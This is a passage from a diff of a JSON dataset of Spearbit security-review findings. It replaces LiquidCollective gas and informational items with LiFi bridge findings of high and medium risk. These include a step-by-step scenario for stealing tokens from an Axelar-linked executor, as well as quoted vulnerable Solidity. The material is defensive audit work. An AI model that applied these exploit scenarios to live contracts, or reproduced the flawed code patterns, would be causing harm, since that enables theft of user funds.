calldata sourceChain, string calldata sourceAddress, bytes calldata payload, string calldata tokenSymbol, uint256 amount ) external { bytes32 payloadHash = keccak256(payload); if (!gateway.validateContractCallAndMint(commandId, sourceChain, sourceAddress, payloadHash, ,! tokenSymbol, amount)) revert NotApprovedByGateway(); _executeWithToken(sourceChain, sourceAddress, payload, tokenSymbol, amount); } The nuance lies in the Axelar gateway AxelarGateway.sol#L133-L148. Once the receiver calls validateContract- CallAndMint with a valid payload, the gateway mints the tokens to the receiver and marks it as executed. It is the receiver contracts responsibility to execute the external call. Exploiters can build a malicious external call to trigger validateContractCallAndMint, the Axelar gateway would mint the tokens to the Executor contract. The exploiter can then pull the tokens from the Executor contract. The possible exploit scenario 1. Exploiter build a malicious external call. token.approve(address(exploiter), type(uint256).max) 2. A victim user uses the AxelarFacet to bridge tokens. Since the destination bridge has the best price, the users set the receiver to address(Executor) and finish the swap with this.swapAndCompleteBridgeTokens 3. Exploiter observes the victims bridge tx and way.validateContractCallAndMint. exploiter can pull the minted token from the executor contract since theres max allowance. The executor the minted token. builds an contract gets external call to trigger gate- The 4. The victim calls Executor.execute() with the valid payload. However, since the payload has been triggered by the exploiter, its no longer valid. 12", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Gas Optimization" + "LIFI", + "Severity: High Risk" ] }, { - "title": "Rewrite OperatorRegistry.getOperatorDetails to save gas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "In getOperatorDetails the 1st line is: _index = Operators.indexOf(_name); Since we already have the _index from this line we can use that along with getByIndex to retrieve the _opera- torAddress. This would reduce the gas cost significantly, since Operators.get(_name) calls Operators._getOp- eratorIndex(name) to find the _index again. testExecutorCanSetOperatorLimit() (gas: -1086 (-0.001%)) testGovernorCanSetOperatorLimit() (gas: -1086 (-0.001%)) testUserDepositsForAnotherUser() (gas: -2172 (-0.001%)) testDeniedUser() (gas: -2172 (-0.001%)) testELFeeRecipientPullFunds() (gas: -2172 (-0.001%)) testUserDepositsUnconventionalDeposits() (gas: -2172 (-0.001%)) testUserDeposits() (gas: -2172 (-0.001%)) testNoELFeeRecipient() (gas: -2172 (-0.001%)) testUserDepositsTenPercentFee() (gas: -2172 (-0.001%)) testUserDepositsFullAllowance() (gas: -2172 (-0.001%)) testValidatorsPenaltiesEqualToExecLayerFees() (gas: -2172 (-0.001%)) testValidatorsPenalties() (gas: -2172 (-0.001%)) testUserDepositsOperatorWithStoppedValiadtors() (gas: -3258 (-0.002%)) testMakingFunctionGovernorOnly() (gas: -1086 (-0.005%)) testRandomCallerCannotSetOperatorLimit() (gas: -1086 (-0.005%)) testRandomCallerCannotSetOperatorStatus() (gas: -1086 (-0.005%)) testRandomCallerCannotSetOperatorStoppedValidatorCount() (gas: -1086 (-0.005%)) testExecutorCanSetOperatorStoppedValidatorCount() (gas: -1086 (-0.006%)) testGovernorCanSetOperatorStatus() (gas: -1086 (-0.006%)) testGovernorCanSetOperatorStoppedValidatorCount() (gas: -1086 (-0.006%)) testGovernorCanAddOperator() (gas: -1086 (-0.006%)) testExecutorCanSetOperatorStatus() (gas: -1086 (-0.006%)) Overall gas change: -36924 (-0.062%) Also note, when the operator is not OperatorResolution.active, _index becomes -1 in both cases. With the change suggested if _index is -1, uint256(_index) == type(uint256).max which would cause getByIndex to revert with OperatorNotFoundAtIndex(index). But with the current code, it will revert with an index out-of-bound type of error. _operatorAddress = Operators.getByIndex(uint256(_index)).operator;", + "title": "LibSwap may pull tokens that are different from the specified asset", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "LibSwap.swap is responsible for doing swaps. Its designed to swap one asset at a time. The _- swapData.callData is provided by user and the LiFi protocol only checks its signature. As a result, users can build a calldata to swap a different asset as specified. For example, the users can set fromAssetId = dai provided addLiquidity(usdc, dai, ...) as call data. The uniswap router would pull usdc and dai at the same time. If there were remaining tokens left in the LiFi protocol, users can sweep tokens from the protocol. library LibSwap { function swap(bytes32 transactionId, SwapData calldata _swapData) internal { ... if (!LibAsset.isNativeAsset(fromAssetId)) { LibAsset.maxApproveERC20(IERC20(fromAssetId), _swapData.approveTo, fromAmount); if (toDeposit != 0) { LibAsset.transferFromERC20(fromAssetId, msg.sender, address(this), toDeposit); } } else { nativeValue = fromAmount; } // solhint-disable-next-line avoid-low-level-calls (bool success, bytes memory res) = _swapData.callTo.call{ value: nativeValue ,! }(_swapData.callData); if (!success) { string memory reason = LibUtil.getRevertMsg(res); revert(reason); } }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Gas Optimization" + "LIFI", + "Severity: Medium Risk" ] }, { - "title": "Rewrite/simplify OracleV1.isMember to save gas.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "OracleV1.isMember can be simplified to save gas.", + "title": "Check slippage of swaps", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Several bridges check that the output of swaps isnt 0. However it could also happen that swap give a positive output, but still lower than expected due to slippage / sandwiching / MEV. Several AMMs will have a mechanism to limit slippage, but it might be useful to add a generic mechanism as multiple swaps in sequence might have a relative large slippage. function swapAndStartBridgeTokensViaOmniBridge(...) ... { ... uint256 amount = _executeAndCheckSwaps(_lifiData, _swapData, payable(msg.sender)); if (amount == 0) { revert InvalidAmount(); } _startBridge(_lifiData, _bridgeData, amount, true); }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Gas Optimization" + "LIFI", + "Severity: Medium Risk" ] }, { - "title": "Cache beaconSpec.secondsPerSlot * beaconSpec.slotsPerEpoch multiplication in to save gas.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The calculation for _startTime and _endTime uses more multiplication than is necessary.", + "title": "Replace createRetryableTicketNoRefundAliasRewrite() with depositEth()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The function _startBridge() of the ArbitrumBridgeFacet uses createRetryableTicketNoRefun- dAliasRewrite(). According to the docs: address-aliasing, this method skips some address rewrite magic that depositEth() does. Normally depositEth() should be used, according to the docs depositing-and-withdrawing-ether. Also this method will be deprecated after nitro: Inbox.sol#L283-L297. While the bridge doesnt do these checks of depositEth(), it is easy for developers, that call the LiFi contracts directly, to make mistakes and loose tokens. function _startBridge(...) ... { ... if (LibAsset.isNativeAsset(_bridgeData.assetId)) { gatewayRouter.createRetryableTicketNoRefundAliasRewrite{ value: _amount + cost }(...); } ... ... }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Gas Optimization" + "LIFI", + "Severity: Medium Risk" ] }, { - "title": "_rewardOperators could save gas by skipping operators with no active and funded validators", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "_rewardOperators is the River function that distribute the earning rewards to each active operator based on the amount of active validators. The function iterate over the list of active operators returned by OperatorsRegistryV1.listActiveOperators calculating the total amount of active and funded validators (funded-stopped) and the number of active and funded validators (funded-stopped) for each operator. Because of current code, the final temporary array validatorCounts could have some item that contains 0 if the operator in the index position had no more active validators. This mean that: 1) gas has been wasted during the loop 2) gas will be wasted in the second loop, distributing 0 shares to an operator without active and funded valida- tors 3) _mintRawShares will be executed without minting any shares but emitting a Transfer event", + "title": "Hardcode or whitelist the Axelar destinationAddress", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The functions executeCallViaAxelar() and executeCallWithTokenViaAxelar() call a destina- tionAddress on the destinationChain. This destinationAddress needs to have specific Axelar functions (_ex- ecute() and _executeWithTokento() ) be able to receive the calls. This is implemented in the Executor. If these functions dont exist at the destinationAddress, the transferred tokens will be lost. /// @param destinationAddress the address of the LiFi contract on the destinationChain function executeCallViaAxelar(..., string memory destinationAddress, ...) ... { ... s.gateway.callContract(destinationChain, destinationAddress, payload); } Note: the comment \"the address of the LiFi contract\" isnt clear, it could either be the LiFi Diamond or the Execu- tor.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Gas Optimization" + "LIFI", + "Severity: Medium Risk" ] }, { - "title": "Consider adding a strict check to prevent Oracle admin to add more than 256 members", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "At the time of writing this issue in the latest commit at 030b52feb5af2dd2ad23da0d512c5b0e55eb8259, in the natspec docs of OracleMembers there is a @dev comment that says @dev There can only be up to 256 oracle members. This is due to how report statuses are stored in Reports Positions If we look at ReportsPositions.sol the natspec docs explains that Each bit in the stored uint256 value tells if the member at a given index has reported But both Oracle.addMember and OracleMembers.push do not prevent the admin to add more than 256 items to the list of oracle members. If we look at the result of the test (located in Appendix), we can see that: It's possible to add more than 256 oracle members. The result of oracle.getMemberReportStatus(oracleMember257) return true even if the oracle member has not reported yet. Because of that, oracle.reportConsensusLayerData (executed by oracleMember257) reverts correctly. If we remove a member from the list (for example oracle member with index 1) the oracleMember257 it will be able to vote because will be swapped with the removed member and at oracle.getMemberReportStatus(oracleMember257) return false. this point 45", + "title": "WormholeFacet doesnt send native token", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The functions of WormholeFacet allow sending the native token, however they dont actually send it across the bridge, causing the native token to stay stuck in the LiFi Diamond and get lost for the sender. contract WormholeFacet is ILiFi, ReentrancyGuard, Swapper { function startBridgeTokensViaWormhole(... ) ... payable ... { // is payable LibAsset.depositAsset(_wormholeData.token, _wormholeData.amount); // allows native token _startBridge(_wormholeData); ... } function _startBridge(WormholeData memory _wormholeData) private { ... LibAsset.maxApproveERC20(...); // geared towards ERC20, also works when `msg.value` is set // no { value : .... } IWormholeRouter(_wormholeData.wormholeRouter).transferTokens(...); } }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Medium Risk" ] }, { - "title": "ApprovalsPerOwner.set does not check if owner or spender is address(0).", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "When ApprovalsPerOwner value is set for an owner and a spender, the addresses of the owner and the spender are not checked against address(0).", + "title": "ArbitrumBridgeFacet does not check if msg.value is enough to cover the cost", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The ArbitrumBridgeFacet does not check whether the users provided ether (msg.value) is enough to cover _amount + cost. If there are remaining ethers in LiFis LibDiamond address, exploiters can set a large cost and sweep the ether. function _startBridge( ... ) private { ... uint256 cost = _bridgeData.maxSubmissionCost + _bridgeData.maxGas * _bridgeData.maxGasPrice; if (LibAsset.isNativeAsset(_bridgeData.assetId)) { gatewayRouter.createRetryableTicketNoRefundAliasRewrite{ value: _amount + cost }( ... ); } else { gatewayRouter.outboundTransfer{ value: cost }( ... ); }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Medium Risk" ] }, { - "title": "Quorum could be higher than the number of oracles, DOSing the Oracle contract", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The current implementation of Oracle.setQuorum only checks if the _newQuorum input parameter is not 0 or equal to the current quorum value. By setting a quorum higher than the number of oracle members, no quorum could be reached for the current or future slots.", + "title": "Underpaying Optimism l2gas may lead to loss of funds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The OptimismBridgeFacet uses Optimisms bridge with user-provided l2gas. function _startBridge( LiFiData calldata _lifiData, BridgeData calldata _bridgeData, uint256 _amount, bool _hasSourceSwap ) private { ... if (LibAsset.isNativeAsset(_bridgeData.assetId)) { bridge.depositETHTo{ value: _amount }(_bridgeData.receiver, _bridgeData.l2Gas, \"\"); } else { ... bridge.depositERC20To( _bridgeData.assetId, _bridgeData.assetIdOnL2, _bridgeData.receiver, _amount, _bridgeData.l2Gas, \"\" ); } } Optimisms standard token bridge makes the cross-chain deposit by sending a cross-chain message to L2Bridge. L1StandardBridge.sol#L114-L123 17 // Construct calldata for finalizeDeposit call bytes memory message = abi.encodeWithSelector( IL2ERC20Bridge.finalizeDeposit.selector, address(0), Lib_PredeployAddresses.OVM_ETH, _from, _to, msg.value, _data ); // Send calldata into L2 // slither-disable-next-line reentrancy-events sendCrossDomainMessage(l2TokenBridge, _l2Gas, message); If the l2Gas is underpaid, finalizeDeposit will fail and user funds will be lost.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Medium Risk" ] }, { - "title": "ConsensusLayerDepositManager.depositToConsensusLayer should be called only after a quorum has been reached to avoid rewarding validators that have not performed during the frame", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "Alluvial is not tracking timestamps or additional information of some actions that happen on-chain like when operator validator is funded on the beacon chain. when an operator is added. when validators are added or removed. when a quorum is reached. when rewards/penalties/slashes happen and which validator is involved. and so on... 46 By not having these enriched informations it could happen that validators that have not contributed to a frame will still get rewards and this could be not fair to other validators that have contributed to the overall balance by working and bringing rewards. Let's make an example: we have 10 operators with 1k validators each at the start of a frame. At some point during the very end of the frame validato_10 get approved 9k validators and all of them get funded. Those validators only participated a small fraction in the production of the rewards. But because there's no way to track these timing and because oracles do not know anything about these (they just need to report the balance and the number of validators during the frame) they will report and arrive to a quorum of reportBeacon(correctEpoch, correctAmountOfBalance, 21_000) that will trigger the OracleManagerV1.setBeaconData. The contract check that 21_000 > DepositedValidatorCount.get() will pass and _onEarnings is called. Let's not consider the math involved in the process of calculating the number of shares to be distributed based on the staked balance delta, let's say that because of all the increase in capital Alluvial will call _rewardOperators(1_- 000_000); distributing 1_000_000 shares to operators based on the number of validators that produced that reward. Because as we said we do not know how much each validator has contributed, those shares will be contributed in the same way to operators that could have not contributed at all to the epoch. This is true for both scenarios where validators that have joined or exited the beacon chain not at the start of the epoch where the last quorum was set.", + "title": "Funds can be locked during the recovery stage", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The recovery is an address that should receive funds if the execution fails on destination do- main. This ensures that funds are never lost with failed calls. However, in the AmarokFacet It is hardcoded as msg.sender. Several unexpected behaviour can be observed with this implementation. If the msg.sender is a smart contract, It might not be available on the destination chain. If the msg.sender is a smart contract and deployed on the other chain, the contract maybe will not have function to withdraw native token. As a result of this implementation, funds can be locked when an execution fails. 18 contract AmarokFacet is ILiFi, SwapperV2, ReentrancyGuard { ... IConnextHandler.XCallArgs memory xcallArgs = IConnextHandler.XCallArgs({ params: IConnextHandler.CallParams({ to: _bridgeData.receiver, callData: _bridgeData.callData, originDomain: _bridgeData.srcChainDomain, destinationDomain: _bridgeData.dstChainDomain, agent: _bridgeData.receiver, recovery: msg.sender, forceSlow: false, receiveLocal: false, callback: address(0), callbackFee: 0, relayerFee: 0, slippageTol: _bridgeData.slippageTol }), transactingAssetId: _bridgeData.assetId, amount: _amount }); ... }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Document the decision to include executionLayerFees in the logic to trigger _onEarnings to dis- tribute rewards to Operators and Treasury", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The setBeaconData function from OracleManager contract is called when oracle members have reached a quorum. The function after checking that the report data respects some integrity check performs a check to distribute rewards to operators and treasury if needed: uint256 executionLayerFees = _pullELFees(); if (previousValidatorBalanceSum < _validatorBalanceSum + executionLayerFees) { _onEarnings((_validatorBalanceSum + executionLayerFees) - previousValidatorBalanceSum); } The delta between _validatorBalanceSum and previousValidatorBalanceSum is the sum of all the rewards, penalties and slashes that validators have accumulated during the validation work of one or multiple frames. By adding executionLayerFees to the check, it means that even if the validators have performed poorly (the sum of rewards is less than the sum of penalties+slash) they could still get rewards if executionLayerFees is greater than the negative delta of newSum-prevSum. If we look at the natspec of the _onEarnings it seems that only the validator's balance (without fees) should be used in the if check. 47 /// @notice Handler called if the delta between the last and new validator balance sum is positive /// @dev Must be overriden /// @param _profits The positive increase in the validator balance sum (staking rewards) function _onEarnings(uint256 _profits) internal virtual;", + "title": "What if the receiver of Axelar _executeWithToken() doesnt claim all tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The function _executeWithToken() approves tokens and then calls callTo. If that contract doesnt retrieve the tokens then the tokens stay within the Executor and are lost. Also see: \"Remaining tokens can be sweeped from the LiFi Diamond or the Executor\" contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function _executeWithToken(...) ... { ... // transfer received tokens to the recipient IERC20(tokenAddress).approve(callTo, amount); (bool success, ) = callTo.call(callData); ... } }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Medium Risk" ] }, { - "title": "Consider documenting how and if funds from the execution layer fee recipient are considered inside the annualAprUpperBound and relativeLowerBound boundaries.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "When oracle members reach a quorum, the _pushToRiver function is called. Alluvial is performing some sanity check to prevent malicious oracle member to report malicious beacon data. Inside the function, uint256 prevTotalEth = IRiverV1(payable(address(riverAddress))).totalUnderlyingSupply(); riverAddress.setBeaconData(_validatorCount, _balanceSum, bytes32(_epochId)); uint256 postTotalEth = IRiverV1(payable(address(riverAddress))).totalUnderlyingSupply(); uint256 timeElapsed = (_epochId - LastEpochId.get()) * _beaconSpec.slotsPerEpoch * _beaconSpec.secondsPerSlot; ,! _sanityChecks(postTotalEth, prevTotalEth, timeElapsed); function _sanityChecks(uint256 _postTotalEth, uint256 _prevTotalEth, uint256 _timeElapsed) internal ,! view { if (_postTotalEth >= _prevTotalEth) { uint256 annualAprUpperBound = BeaconReportBounds.get().annualAprUpperBound; if ( uint256(10000 * 365 days) * (_postTotalEth - _prevTotalEth) > annualAprUpperBound * _prevTotalEth * _timeElapsed ) { revert BeaconBalanceIncreaseOutOfBounds(_prevTotalEth, _postTotalEth, _timeElapsed, ,! annualAprUpperBound); } } else { uint256 relativeLowerBound = BeaconReportBounds.get().relativeLowerBound; if (uint256(10000) * (_prevTotalEth - _postTotalEth) > relativeLowerBound * _prevTotalEth) { revert BeaconBalanceDecreaseOutOfBounds(_prevTotalEth, _postTotalEth, _timeElapsed, relativeLowerBound); } ,! } } Both prevTotalEth and postTotalEth call SharesManager.totalUnderlyingSupply() that returns the value from Inside those balance is also included the amount of fees that are pulled from the River._assetBalance(). ELFeeRecipient (Execution Layer Fee Recipient). Alluvial should document how and if funds from the execution layer fee recipient are also considered inside the annualAprUpperBound and relativeLowerBound boundaries. 48", + "title": "Remaining tokens can be sweeped from the LiFi Diamond or the Executor", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The initial balance of (native) tokens in both the Lifi Diamond and the Executor contract can be sweeped by all the swap functions in all the bridges, which use the following functions: swapAndCompleteBridgeTokensViaStargate() of Executor.sol swapAndCompleteBridgeTokens() of Executor.sol swapAndExecute() of Executor.sol _executeAndCheckSwaps() of SwapperV2.sol _executeAndCheckSwaps() of Swapper.sol swapAndCompleteBridgeTokens() of XChainExecFacet Although these functions ... swapAndCompleteBridgeTokensViaStargate() of Executor.sol swapAndCompleteBridgeTokens() of Executor.sol swapAndExecute() of Executor.sol swapAndCompleteBridgeTokens() of XChainExecFacet have the following code: if (!LibAsset.isNativeAsset(transferredAssetId)) { startingBalance = LibAsset.getOwnBalance(transferredAssetId); // sometimes transfer tokens in } else { startingBalance = LibAsset.getOwnBalance(transferredAssetId) - msg.value; } // do swaps uint256 postSwapBalance = LibAsset.getOwnBalance(transferredAssetId); if (postSwapBalance > startingBalance) { LibAsset.transferAsset(transferredAssetId, receiver, postSwapBalance - startingBalance); } This doesnt protect the initial balance of the first tokens, because it can just be part of a swap to another token. The initial balances of intermediate tokens are not checked or protected. As there normally shouldnt be (native) tokens in the LiFi Diamond or the Executor the risk is limited. Note: set the risk to medium as there are other issues in this report that leave tokens in the contracts Although in practice there is some dust in the LiFi Diamond and the Executor: 0x362fa9d0bca5d19f743db50738345ce2b40ec99f 0x46405a9f361c1b9fc09f2c83714f806ff249dae7", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Medium Risk" ] }, { - "title": "Allowlist.allow allows arbitrary values for _statuses input", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The current implementation of allow does not check if the value inside each _statuses item is a valid value or not. The function can be called by both the administrator or the allower (roles authorized to manage the user permissions) that can specify arbitrary values to be assigned to the corresponding _accounts item. The user's permissions handled by Allowlist are then used by the River contract in different parts of the code. Those permissions inside the River contracts are a limited set of permissions that could not match what the allower /admin of the Allowlist has used to update a user's permission when the allow function was called.", + "title": "Wormhole bridge chain IDs are different than EVM chain IDs", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "According to documentation, Wormhole uses different chain ids than EVM based chain ids. However, the code is implemented with block.chainid check. LiFi is integrated with third party platforms through API. The API/UI side can implement chain id checks, but direct interaction with the contract can lead to loss of funds. function _startBridge(WormholeData memory _wormholeData) private { if (block.chainid == _wormholeData.toChainId) revert CannotBridgeToSameNetwork(); } From other perspective, the following line limits the recipient address to an EVM address. done to a non EVM chain (e.g. Solana, Terra, Terra classic), then the tokens would be lost. If a bridge would be ... bytes32(uint256(uint160(_wormholeData.recipient))) ... Example transactions below. Chainid 1 Solana Chainid 3 Terra Classic On the other hand, the usage of the LiFi protocol depends largely on off chain APIs. It takes all values, fees, limits, chain ids and addresses to be called from the APIs. As previously mentioned, the wormhole destination chain ids are different than standard EVM based chains, the following event can be misinterpreted. ... emit LiFiTransferStarted( _lifiData.transactionId, \"wormhole\", \"\", _lifiData.integrator, _lifiData.referrer, _swapData[0].sendingAssetId, _lifiData.receivingAssetId, _wormholeData.recipient, _swapData[0].fromAmount, _wormholeData.toChainId, // It does not show correct chain id which is expected by LiFi Data Analytics true, false ,! ); ...", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Medium Risk" ] }, { - "title": "Consider exploring a way to update the withdrawal credentials and document all the possible scenarios", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The withdrawal credentials is currently set when River.initRiverV1 is called. The func- tion will internally call ConsensusLayerDepositManager.initConsensusLayerDepositManagerV1 that will perform WithdrawalCredentials.set(_withdrawalCredentials); After initializing the withdrawal credentials, there's no way to update it and change it. The withdrawal cre- dentials is a key part of the whole protocol and everything that concern it should be well documented including all the worst-case scenario What if the withdrawal credentials is lost? What if the withdrawal credentials is compromised? What if the withdrawal credentials must be changed (lost, compromised or simply the wrong one has been submitted)? What should be implemented inside the Alluvial logic to use the new withdrawal creden- tials for the operator's validators that have not been funded yet (the old withdrawal credentials has not been sent to the Deposit contract)? Note that currently there's seem to be no way to update the withdrawal credentials for a validator already submitted to the Deposit contract.", + "title": "Facets approve arbitrary addresses for ERC20 tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "All the facets pointed above approve an address for an ERC20 token, where both these values are provided by the user: LibAsset.maxApproveERC20(IERC20(token), router, amount); The parameter names change depending on the context. So for any ERC20 token that LifiDiamond contract holds, user can: call any of the functions in these facets to approve another address for that token. use the approved address to transfer tokens out of LifiDiamond contract. Note: normally there shouldnt be any tokens in the LiFi Diamond contract so the risk is limited. Note: also see \"Hardcode bridge addresses via immutable\"", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Medium Risk AcrossFacet.sol#L103, ArbitrumBridge-" ] }, { - "title": "Oracle contract allows members to skip frames and report them (even if they are past) one by one or all at once", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The current implementation of reportBeacon allows oracle members to skip frames (255 epochs) and report them (even if they are past) one by one or all at once. Let's assume that members arrived to a quorum for epochId_X. When quorum is reached, _pushToRiver is called, and it will update the following properties: clean all the storage used for member reporting. set ExpectedEpochId to epochId_X + 255. set LastEpochId to epochId_X. With this context, let's assume that members decide to wait 30 frames (30 days) or that for 30 days they cannot arrive at quorum. At the new time, the new epoch would be epochId_X + 255 * 30 The following scenarios can happen: 1) Report at once all the missed epochs Instead of reporting only the current epoch (epochId_X + 255 * 30), they will report all the previous \"skipped\" epochs that are in the past. In this scenario, ExpectedEpochId contains the number of the expected next epoch assigned 30 days ago from the previous call to _pushToRiver. In reportBeacon if the _epochId is what the system expect (equal to Expect- edEpochId) the report can go on. So to be able to report all the missing reports of the \"skipped\" frames the member just need to call in a se- quence reportBeacon(epochId_X + 255, ...), reportBeacon(epochId_X + 255 + 255, ...) + .... + report- Beacon(epochId_X + 255 * 30, ...) 2) Report only the last epoch In this scenario, they would call directly reportBeacon(epochId_X + 255 * 30, ...). _pushToRiver call _sani- tyChecks to perform some checks as do not allow changes in the amount of staked ether that are below or above some bounds. The call that would be made is _sanityChecks(oracleReportedStakedBalance, prevTotalEth, timeElapsed) where timeElapsed is calculated as uint256 timeElapsed = (_epochId - LastEpochId.get()) * _beacon- Spec.slotsPerEpoch * _beaconSpec.secondsPerSlot; So, time elapsed is the number of seconds between the reported epoch and the LastEpochId. But in this scenario, LastEpochId has the old value from the previous call to _pushToRiver made 30 days ago that will be epochId_X. Because of this, the check made inside _sanityChecks for the upper bound would be more relaxed, allowing a wider spread between oracleReportedStakedBalance and prevTotalEth", + "title": "FeeCollector not well integrated", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "There is a contract to pay fees for using the bridge: FeeCollector. This is used by crafting a transaction by the frontend API, which then calls the contract via _executeAndCheckSwaps(). Here is an example of the contract Here is an example of the contract of such a transaction Its whitelisted here This way no fees are paid if a developer is using the LiFi contracts directly. Also it is using a mechanism that isnt suited for this. The _executeAndCheckSwaps() is geared for swaps and has several checks on balances. These (and future) checks could interfere with the fee payments. Also this is a complicated and non transparent approach. The project has suggested to see _executeAndCheckSwaps() as a multicall mechanism.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Medium Risk" ] }, { - "title": "Consider renaming OperatorResolution.active to a more meaningful name", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The name active in the struct OperatorResolution could be misleading because it can be confused with the fact that an operator (the struct containing the real operator information is Operator ) is active or not. The value of OperatorResolution.active does not represent if an operator is active, but is used to know if the index associated to the struct's item (OperatorResolution.index) is used or not.", + "title": "_executeSwaps of Executor.sol doesnt have a whitelist", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The function _executeSwaps() of Executor.sol doesnt have a whitelist, whereas _executeSwaps() of SwapperV2.sol does have a whitelist. Calling arbitrary addresses is dangerous. For example, unlimited al- lowances can be set to allow stealing of leftover tokens in the Executor contract. Luckily, there wouldnt normally be allowances set from users to the Executor.sol so the risk is limited. Note: also see \"Too generic calls in GenericBridgeFacet allow stealing of tokens\" contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function _executeSwaps(... ) ... { for (uint256 i = 0; i < _swapData.length; i++) { if (_swapData[i].callTo == address(erc20Proxy)) revert UnAuthorized(); // Prevent calling ,! ERC20 Proxy directly LibSwap.SwapData calldata currentSwapData = _swapData[i]; LibSwap.swap(_lifiData.transactionId, currentSwapData); } } contract SwapperV2 is ILiFi { function _executeSwaps(... ) ... { for (uint256 i = 0; i < _swapData.length; i++) { LibSwap.SwapData calldata currentSwapData = _swapData[i]; if ( !(appStorage.dexAllowlist[currentSwapData.approveTo] && appStorage.dexAllowlist[currentSwapData.callTo] && appStorage.dexFuncSignatureAllowList[bytes32(currentSwapData.callData[:8])]) ) revert ContractCallNotAllowed(); LibSwap.swap(_lifiData.transactionId, currentSwapData); } } Based on the comments of the LiFi project there is also the use case to call more generic contracts, which do not return any token, e.g., NFT buy, carbon offset. It probably better to create new functionality to do this.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Medium Risk" ] }, { - "title": "lsETH and WlsETH's name() functions return inconsistent name.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "lsETH.name() is River Ether, while WlsETH.name() is Wrapped Alluvial Ether.", + "title": "Processing of end balances", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The contract SwapperV2 has the following construction (twice) to prevent using any already start balance. it gets a start balance. does an action. if the end balance > start balance. then it uses the difference. else (which includes start balance == end balance) it uses the end balance. So if the else clause it reached it uses the end balance and ignores any start balance. If the action hasnt changed the balances then start balance == end balance and this amount is used. When the action has lowered the balances then end balance is also used. This defeats the codes purpose. Note: normally there shouldnt be any tokens in the LiFi Diamond contract so the risk is limited. Note Swapper.sol has similar code. contract SwapperV2 is ILiFi { modifier 